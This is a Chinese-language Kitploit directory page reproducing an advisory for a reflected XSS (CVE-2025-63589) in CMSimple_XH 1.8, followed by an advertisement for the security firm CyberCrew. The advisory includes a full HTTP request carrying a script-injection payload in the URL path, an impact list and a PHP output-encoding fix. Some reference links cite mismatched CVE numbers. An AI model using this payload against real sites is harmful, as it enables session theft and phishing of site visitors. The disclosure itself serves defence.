Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-63589 — 针对 CMSimple_XH 1.8 的反射型 XSS 概念验证,通过未清理的路径片段实现未经认证的脚本注入,包含 CVSS 6.1 评分及 PHP 修复示例。 | Kitploit
工具/GitHubGitHub/cybercrewinc/cve-2025-63589
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试学习与教育
GitHubcybercrewinc/cve-2025-63589

CVE-2025-63589

针对 CMSimple_XH 1.8 的反射型 XSS 概念验证,通过未清理的路径片段实现未经认证的脚本注入,包含 CVSS 6.1 评分及 PHP 修复示例。

查看仓库
110个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-63589 CMSimple_XH index.php 路径处理中的反射型 XSS

发现日期: 2025年10月6日
产品: CMSimple_XH(开源平面文件 CMS)
受影响版本: 1.8
CVE 编号: CVE-2025-63589 是否需要认证: 不需要(未认证)
攻击类型: 反射型跨站脚本(XSS)
估算 CVSS v3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1(中危)

index.php 中的前端控制器接受动态路径段(用于路由到模板/页面),并将这些值传递给模板渲染。代码在将这些路径段插入到属性和锚点 href 之前,没有正确进行清理或 HTML 编码。因此,特制的请求 URI(包含 "> 等字符以及注入的标签,如 <script>...</script>)会原样反映到 HTML 输出中,并在浏览器中执行。

典型的反射点包括:

  • 表单 action 属性(如登录/搜索表单)
  • 导航/菜单项 href 属性
  • 面包屑 / 定位导航(<nav class="locator">)
  • 页脚链接(打印视图、站点地图、登录 等)

由于输入最终出现在 HTML 属性上下文和锚点内容中,需要进行标准的属性编码,但缺少这一步骤。

概念验证(PoC)

请求:

root@kitploit:~
POST /cmsimplexh/index.php/gjtqw"><script>alert(1)</script>co2cu HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates/TEMPLATE-overlay_03
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 32

search=Search...&function=search
Pasted image 20251006203832

响应:

Pasted image 20251006203959 Pasted image 20251006204254

注入的有效载荷 gjtqw"><script>alert(1)</script>co2cu 未经编码地被反映到菜单链接、面包屑、搜索表单操作和页脚链接中,导致页面渲染时脚本被执行。

推荐的安全输出 action 属性的 PHP 示例:

root@kitploit:~
$safe_segment = rawurlencode($segment);              // 路径安全
$action = '/cmsimplexh/index.php/' . $safe_segment;
echo '<form action="' . htmlspecialchars($action, ENT_QUOTES, 'UTF-8') . '">';

影响

  • 客户端代码执行(在受害者浏览器中运行任意 JS)
  • 信息泄露(读取 DOM,窃取客户端可访问的 Cookie/令牌)
  • 会话劫持/冒充(如果会话令牌对 JS 可访问且未设置 HttpOnly)
  • UI 欺骗/钓鱼(呈现虚假的登录提示或虚假页面)
  • 强制操作(利用受害者的已认证会话执行操作)

致谢

分配的 CVE:CVE-2025-63589

https://nvd.nist.gov/vuln/detail/CVE-2025-63588

发现者:株式会社CyberCrew / サイバークル

参考信息

https://github.com/cmsimple-xh/cmsimple-xh/blob/master/index.php

https://nvd.nist.gov/vuln/detail/CVE-2025-24576


✉️ 联系我们

如有任何疑问或咨询,请随时与我们联系。


🏢 株式会社CyberCrew

G1@4x

📞 电话: 03-6853-5823
📧 邮箱:[email protected]


📄 公司概况

项目内容
公司名称株式会社CyberCrew
所在地东京都千代田区外神田1-18-13 秋叶原大廈6层

🔐 主要服务

🛡️ 安全诊断与风险评估

多角度分析组织的脆弱性,提出最优的改进方案。

💻 渗透测试

支持针对性测试、场景型测试以及 LLM 渗透测试。

🌒 暗网监控

早期检测机密信息泄露,迅速应对。

🎯 红队演习与社会工程学

基于实战攻击场景的防御能力评估。

🧠 安全系统设计与咨询

从开发初期阶段就考虑安全性的设计支持。


🌐 官方网站:https://www.cybercrew.co.jp
🕒 CyberCrew — 您值得信赖的安全合作伙伴。

下载工具